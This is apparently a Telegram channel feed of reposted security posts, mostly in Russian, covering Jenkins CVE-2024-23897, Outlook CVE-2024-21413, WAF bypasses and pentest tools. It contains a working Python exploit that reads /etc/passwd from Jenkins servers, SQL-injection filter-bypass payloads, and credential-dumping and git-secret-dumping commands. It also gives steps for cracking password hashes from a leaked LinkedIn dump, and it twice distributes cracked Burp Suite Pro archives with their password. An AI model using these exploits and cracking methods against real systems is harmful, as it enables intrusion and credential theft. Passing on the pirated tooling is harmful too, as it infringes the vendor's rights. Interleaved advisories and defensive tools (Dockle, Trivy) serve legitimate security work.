Forwarded from burpsuite (not official)
burpsuite_pro_v2023.12.1.2.zip
686 MB
pass: 311138
README (en+ru) included, plz read it before run BS.
Happy Hacking! 🥳
Run with Java 18 (JDK for Win included)
+BurpBountyPro_v2.7.0
README (en+ru) included, plz read it before run BS.
Happy Hacking! 🥳
Run with Java 18 (JDK for Win included)
+BurpBountyPro_v2.7.0
❤1
Forwarded from The Hacker News
🚨 Urgent: Critical Jenkins RCE vulnerability (CVE-2024-23897) discovered.
Hackers can remotely control your CI/CD pipelines. Patch immediately to prevent malicious code in builds.
Details here: https://thehackernews.com/2024/01/critical-jenkins-vulnerability-exposes.html
Hackers can remotely control your CI/CD pipelines. Patch immediately to prevent malicious code in builds.
Details here: https://thehackernews.com/2024/01/critical-jenkins-vulnerability-exposes.html
🫡2❤1
Forwarded from Похек (Sergey Zybnev)
Jenkins RCE CVE-2024-23897
Критическая уязвимость в Jenkins. Позволяет выполнить RCE на атакуемой машине через уязвимый модуль args4j.
PoC
Использование:
🌚 @poxek
Критическая уязвимость в Jenkins. Позволяет выполнить RCE на атакуемой машине через уязвимый модуль args4j.
PoC
import threading
import http.client
import time
import uuid
import urllib.parse
import sys
if len(sys.argv) != 3:
print('[*] usage: python poc.py http://127.0.0.1:8888/ [/etc/passwd]')
exit()
data_bytes = b'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@' + sys.argv[2].encode() + b'\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05zh_CN\x00\x00\x00\x00\x03'
target = urllib.parse.urlparse(sys.argv[1])
uuid_str = str(uuid.uuid4())
print(f'REQ: {data_bytes}\n')
def req1():
conn = http.client.HTTPConnection(target.netloc)
conn.request("POST", "/cli?remoting=false", headers={
"Session": uuid_str,
"Side": "download"
})
print(f'RESPONSE: {conn.getresponse().read()}')
def req2():
conn = http.client.HTTPConnection(target.netloc)
conn.request("POST", "/cli?remoting=false", headers={
"Session": uuid_str,
"Side": "upload",
"Content-type": "application/octet-stream"
}, body=data_bytes)
t1 = threading.Thread(target=req1)
t2 = threading.Thread(target=req2)
t1.start()
time.sleep(0.1)
t2.start()
t1.join()
t2.join()
Использование:
python poc.py http://127.0.0.1:8888/ [/etc/passwd]
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥2❤1
Forwarded from SHADOW:Group
💉 Про обход защиты от SQL-инъекций
Часто WAF на сайте душит все попытки провести SQL-инъекцию и не даетнормально воткнуть кавычку и вставить привычный пэйлоад, однако, нехитрыми манипуляциями все же частенько его можно обойти.
Например, добавив управляющие символы , типа
Еще больше примеров, вы можете найти в этом репозитории, где приведены варианты байпасса для различных ситуаций, а также крайне рекомендую этот сайт.
#web #sqli #bypass #waf
Часто WAF на сайте душит все попытки провести SQL-инъекцию и не дает
Например, добавив управляющие символы , типа
%00, %0A и др. или вставив математические операции ('AND'1'=1*1 вместо 'AND'1'='1') или добавив специфичные комментарии типа /*!50000%55nIoN*/ /*!50000%53eLeCt*/ и многое другое.Еще больше примеров, вы можете найти в этом репозитории, где приведены варианты байпасса для различных ситуаций, а также крайне рекомендую этот сайт.
#web #sqli #bypass #waf
Please open Telegram to view this post
VIEW IN TELEGRAM
❤2
Web tools, или с чего начать пентестеру?
https://habr.com/ru/companies/dsec/articles/452836/
https://habr.com/ru/companies/dsec/articles/452836/
Forwarded from PWN AI
Машинно-генерируемый код .. его так много и все мы с вами понимаем что он небезопасен.
Но можно ли заставить машину искать небезопасный код?
И вы можете сказать - мол "вставлю в гпт, попрошу - 'перепиши безопасно' " - но к сожалению так не заработает ...
В этом посте, я хочу с вами поделиться инструментом, который использует машинное обучение и помогает прогнозировать и обнаруживать уязвимости в коде (написанном или который пишется) на крестах(c++) .. да-да если есть такое для питона, то пришлите в комментариях.
В общем, AIBughunter - это дополнение, которое может быть интегрировано в vscode. Обучали его на данных из NVD.
В чём его плюсы для плюсов:
Последний коммит расширения произошёл в прошлом году, однако разработчики не забросили проект - даже недавно написали paper по нему.
[демо-видос]
#аппсековое #code
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Ralf Hacker Channel (Ralf Hacker)
Так, ADCS ESC13
https://posts.specterops.io/adcs-esc13-abuse-technique-fda4272fbd53
P.S. А 12 тоже мимо вас прошел😅
#ad #adcs #pentest #redteam
https://posts.specterops.io/adcs-esc13-abuse-technique-fda4272fbd53
P.S. А 12 тоже мимо вас прошел😅
#ad #adcs #pentest #redteam
SpecterOps
ADCS ESC13 Abuse Technique - SpecterOps
How to defend against ADCS abuse: ESC13 and beyond. Learn how attackers exploit Active Directory Certificate Services to escalate privileges.
Forwarded from SecuriXy.kz
Теперь можно извлекать учетные данные без обращения к диску (Dumping credentials without touching disk) с помощью утилиты #go-secdump которая поддерживает и SOCKS Proxy решая проблему #Impacket
https://github.com/jfjallid/go-secdump
скоро и в Impacket запилят и будет красота
https://github.com/fortra/impacket/pull/1698
https://github.com/jfjallid/go-secdump
скоро и в Impacket запилят и будет красота
https://github.com/fortra/impacket/pull/1698
Forwarded from Cult Of Wire
Для проверки Docker-образов на уязвимости есть хороший инструмент - Trivy. Сам использую и другим советую. Но сейчас не про него. Trivy хоть и хороший инструмент, но покрывает только поиск уязвимостей.
Trivy неплохо дополняет другой инструмент - Dockle.
Dockle это security linter, который проверяет Dockerfile на уязвимости (Dockle Checkpoints for Docker и Dockle Checkpoints for Linux), помимо этого проверяет и на соответствие Dockerfile Best practices и рекомендациям CIS Docker Benchmarks.
В использовании Dockle довольно прост, так как это одиночный бинарник. Так же есть пакеты для установки под популярные системы.
Можно запустить и в Docker без установки:
Или так:
Кроме того есть возможность вывод отчёта в json файл c помощью
В контейнере можно сделать так:
Dockle легко интегриуется в CI/CD и с DefectDojo.
Из незначительных минусов могу отметить то, что Dockle не умеет сканировать Dockerfile, но для этого есть hadolint, хоть он и менее информативен.
Trivy неплохо дополняет другой инструмент - Dockle.
Dockle это security linter, который проверяет Dockerfile на уязвимости (Dockle Checkpoints for Docker и Dockle Checkpoints for Linux), помимо этого проверяет и на соответствие Dockerfile Best practices и рекомендациям CIS Docker Benchmarks.
В использовании Dockle довольно прост, так как это одиночный бинарник. Так же есть пакеты для установки под популярные системы.
Можно запустить и в Docker без установки:
VERSION=$(
curl --silent "https://api.github.com/repos/goodwithtech/dockle/releases/latest" | \
grep '"tag_name":' | \
sed -E 's/.*"v([^"]+)".*/\1/' \
) && docker run --rm -v /var/run/docker.sock:/var/run/docker.sock \
goodwithtech/dockle:v${VERSION} goodwithtech/dockle-test:v2
Или так:
export DOCKLE_LATEST=$(
curl --silent "https://api.github.com/repos/goodwithtech/dockle/releases/latest" | \
grep '"tag_name":' | \
sed -E 's/.*"v([^"]+)".*/\1/' \
)
docker run --rm goodwithtech/dockle:v${DOCKLE_LATEST} goodwithtech/dockle-test:v2Кроме того есть возможность вывод отчёта в json файл c помощью
-f json -o report_name.json:dockle -f json -o dockle_report.json goodwithtech/dockle-test:v2
В контейнере можно сделать так:
VERSION=$(
curl --silent "https://api.github.com/repos/goodwithtech/dockle/releases/latest" | \
grep '"tag_name":' | \
sed -E 's/.*"v([^"]+)".*/\1/' \
) && docker run --rm -v /var/run/docker.sock:/var/run/docker.sock \
goodwithtech/dockle:v${VERSION} -f json goodwithtech/dockle-test:v2 > dockle_report.json
Dockle легко интегриуется в CI/CD и с DefectDojo.
Из незначительных минусов могу отметить то, что Dockle не умеет сканировать Dockerfile, но для этого есть hadolint, хоть он и менее информативен.
GitHub
GitHub - goodwithtech/dockle: Container Image Linter for Security, Helping build the Best-Practice Docker Image, Easy to start
Container Image Linter for Security, Helping build the Best-Practice Docker Image, Easy to start - goodwithtech/dockle
Forwarded from Ralf Hacker Channel (Ralf Hacker)
CVE-2024-21413: Microsoft Outlook Leak Hash
https://github.com/duy-31/CVE-2024-21413
#exploit #pentest #redteam #ad
https://github.com/duy-31/CVE-2024-21413
#exploit #pentest #redteam #ad
GitHub
GitHub - duy-31/CVE-2024-21413: Microsoft Outlook Information Disclosure Vulnerability (leak password hash) - Expect Script POC
Microsoft Outlook Information Disclosure Vulnerability (leak password hash) - Expect Script POC - duy-31/CVE-2024-21413
Forwarded from AP Security
#poc #cve #exploit
Microsoft Outlook RCE: PoC🤖
Уязвимость, обнаруженная компанией Check Point, получила обозначение CVE-2024-21413. Она активируется при открытии электронных писем с вредоносными ссылками в уязвимых версиях Outlook. Уязвимость затрагивает несколько продуктов Office, включая Microsoft Office LTSC 2021, Microsoft 365 для предприятий, а также Microsoft Outlook 2016 и Microsoft Office 2019
Proof Of Concept
Microsoft Outlook RCE: PoC
Уязвимость, обнаруженная компанией Check Point, получила обозначение CVE-2024-21413. Она активируется при открытии электронных писем с вредоносными ссылками в уязвимых версиях Outlook. Уязвимость затрагивает несколько продуктов Office, включая Microsoft Office LTSC 2021, Microsoft 365 для предприятий, а также Microsoft Outlook 2016 и Microsoft Office 2019
Proof Of Concept
Please open Telegram to view this post
VIEW IN TELEGRAM
GitHub
GitHub - duy-31/CVE-2024-21413: Microsoft Outlook Information Disclosure Vulnerability (leak password hash) - Expect Script POC
Microsoft Outlook Information Disclosure Vulnerability (leak password hash) - Expect Script POC - duy-31/CVE-2024-21413
💘1
Forwarded from burpsuite (not official)
burpsuite_pro_v2024.1.1.1.zip
692.3 MB
pass: 311138
README (en+ru) included, plz read it before run BS.
Happy Hacking! 🥳
Run with Java 18 (JDK for Win included)
+BurpBountyPro_v2.8.0
README (en+ru) included, plz read it before run BS.
Happy Hacking! 🥳
Run with Java 18 (JDK for Win included)
+BurpBountyPro_v2.8.0
👨💻2
Forwarded from Кавычка (Bo0oM)
Быстро и дешево брутим хэши
Короч, есть чуваки такие, immers.cloud
По сути это хостинг с арендой видеокарт. А так как я занимался проектом passleak.ru, иногда нужно было разгадывать хэшики, решил не покупать под это оборудование. Вышло круто.
Тут есть два варианта развития событий.
Арендуем видеокарту (какую - по желанию, они там выкатили какие-то ультра-модные H100, но мне и 2080 часто хватает), грузим туда наши хэши, делаем что-то типа:
Устанавливаем hashcat и играемся с этим всем.
Но если нам нужно побрутить пароли по словарям, способ еще круче. Берем готовый образ Ubuntu + Hashcat + Weakpass 3, на диске будет лежать архив с Weakpass V3. Запускаем и прогоняем хэши, забираем то что сбрутилось, вырубаем машину.
Например, чтоб раскукожить пароли из дампа Linkedin - мне потребовалось рублей... 20?
В общем, круто держать под рукой чтобы быстро сбрутить какой-то хэшик.
>
Короч, есть чуваки такие, immers.cloud
По сути это хостинг с арендой видеокарт. А так как я занимался проектом passleak.ru, иногда нужно было разгадывать хэшики, решил не покупать под это оборудование. Вышло круто.
Тут есть два варианта развития событий.
Арендуем видеокарту (какую - по желанию, они там выкатили какие-то ультра-модные H100, но мне и 2080 часто хватает), грузим туда наши хэши, делаем что-то типа:
sudo apt-get update
sudo apt-get install gcc make tmux git mesa-common-dev cmake nvidia-cuda-toolkit build-essential unzip -y
https://ru.download.nvidia.com/XFree86/Linux-x86_64/470.63.01/NVIDIA-Linux-x86_64-470.63.01.run
chmod +x NVIDIA-Linux-x86_64-470.63.01.run
sudo ./NVIDIA-Linux-x86_64-470.63.01.run
Устанавливаем hashcat и играемся с этим всем.
Но если нам нужно побрутить пароли по словарям, способ еще круче. Берем готовый образ Ubuntu + Hashcat + Weakpass 3, на диске будет лежать архив с Weakpass V3. Запускаем и прогоняем хэши, забираем то что сбрутилось, вырубаем машину.
Например, чтоб раскукожить пароли из дампа Linkedin - мне потребовалось рублей... 20?
В общем, круто держать под рукой чтобы быстро сбрутить какой-то хэшик.
>
👨💻2
Forwarded from PT SWARM
PortSwigger's Top 10 web hacking techniques of 2023!
Welcome to the Top 10 Web Hacking Techniques of 2023, community-powered effort to identify the most important and innovative web security research published in the last year.
🥇 Smashing the state machine: the true potential of web race conditions
🥈 Exploiting Hardened .NET Deserialization
🥉 SMTP Smuggling - Spoofing E-Mails Worldwide
4️⃣ PHP filter chains: file read from error-based oracle
5️⃣ Exploiting HTTP Parsers Inconsistencies
6️⃣ HTTP Request Splitting vulnerabilities exploitation
7️⃣ How I Hacked Microsoft Teams and got $150,000 in Pwn2Own
8️⃣ From Akamai to F5 to NTLM... with love
9️⃣ Cookie Crumbles: Breaking and Fixing Web Session Integrity
🔟 can I speak to your manager? hacking root EPP servers to take control of zones
The entire nomination list you can find here: https://portswigger.net/research/top-10-web-hacking-techniques-of-2023-nominations-open
Welcome to the Top 10 Web Hacking Techniques of 2023, community-powered effort to identify the most important and innovative web security research published in the last year.
🥇 Smashing the state machine: the true potential of web race conditions
🥈 Exploiting Hardened .NET Deserialization
🥉 SMTP Smuggling - Spoofing E-Mails Worldwide
4️⃣ PHP filter chains: file read from error-based oracle
5️⃣ Exploiting HTTP Parsers Inconsistencies
6️⃣ HTTP Request Splitting vulnerabilities exploitation
7️⃣ How I Hacked Microsoft Teams and got $150,000 in Pwn2Own
8️⃣ From Akamai to F5 to NTLM... with love
9️⃣ Cookie Crumbles: Breaking and Fixing Web Session Integrity
🔟 can I speak to your manager? hacking root EPP servers to take control of zones
The entire nomination list you can find here: https://portswigger.net/research/top-10-web-hacking-techniques-of-2023-nominations-open
👾2
Forwarded from Интернет-Розыск
Ну и для облегчения исследования доменных имен...
▫️https://www.lopseg.com.br/osint
😎👍 САЙТ | ВК | TLG
🕵️♂️ ЧАТ-БОТ 🪪 ВИЗИТКА
▫️https://www.lopseg.com.br/osint
😎👍 САЙТ | ВК | TLG
🕵️♂️ ЧАТ-БОТ 🪪 ВИЗИТКА
❤1
Forwarded from #Arm1tage
Git утечки
Раз уж на то пошло, соберу здесь все инструменты, которыми пользуюсь для поиска утечек и других полезных вещей в гит репозиториях.
GitDorker - использует список дорков гита для поиска утечек, токенов, ключей и тп по ключевому слову.
github-dorks - тоже самое, только тут поиск происходит по репозиторию а не по ключевому слову.
git-dumper - если вы нашли на тестируемом сайте .git папку, с помощью этого вы можете сдампить все файлы, которые принадлежат этой папке.
trufflehog - об этом все знают, но не включит не мог. Поиск секретов по репозиториям git или github.
Важно добавить, что у гитхаба есть рейт-лимит, который ограничивает скорость до 30 запросов в минуту. Потому для полного сканирования потребуется некоторое время.
#git #tool
Раз уж на то пошло, соберу здесь все инструменты, которыми пользуюсь для поиска утечек и других полезных вещей в гит репозиториях.
GitDorker - использует список дорков гита для поиска утечек, токенов, ключей и тп по ключевому слову.
python3 GitDorker.py -tf TOKENSFILE -q tesla.com -d Dorks/DORKFILE -o tesla
github-dorks - тоже самое, только тут поиск происходит по репозиторию а не по ключевому слову.
github-dork.py -r techgaun/github-dorks
git-dumper - если вы нашли на тестируемом сайте .git папку, с помощью этого вы можете сдампить все файлы, которые принадлежат этой папке.
./git_dumper.py http://website.com/.git ~/website
trufflehog - об этом все знают, но не включит не мог. Поиск секретов по репозиториям git или github.
trufflehog git https://github.com/trufflesecurity/trufflehog.git
trufflehog github --repo=https://github.com/trufflesecurity/test_keys
Важно добавить, что у гитхаба есть рейт-лимит, который ограничивает скорость до 30 запросов в минуту. Потому для полного сканирования потребуется некоторое время.
#git #tool
❤2